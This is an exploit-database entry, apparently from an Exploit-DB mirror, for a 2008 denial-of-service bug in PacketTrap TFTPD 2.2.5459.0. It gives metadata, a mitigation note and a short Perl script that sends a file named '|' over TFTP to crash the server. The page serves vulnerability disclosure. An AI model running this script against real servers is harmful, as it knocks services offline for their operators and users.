header-logo
Suggest Exploit
vendor:
TFTPD
by:
Jeremy Brown
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: TFTPD
Affected Version From: 2.2.5459.0
Affected Version To: 2.2.5459.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PacketTrap TFTPD DoS

This exploit is used to cause a denial of service in PacketTrap TFTPD. It uses the Net::TFTP module to send a malicious packet to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of PacketTrap TFTPD
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com
# Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;)
# A product of tftpfuzz.pl (coming soon)

use Net::TFTP;
use Getopt::Std;

$tftp = Net::TFTP->new("192.168.0.112");
$tftp->ascii;
$tftp->put("test", "|");

exit;

# milw0rm.com [2008-10-29]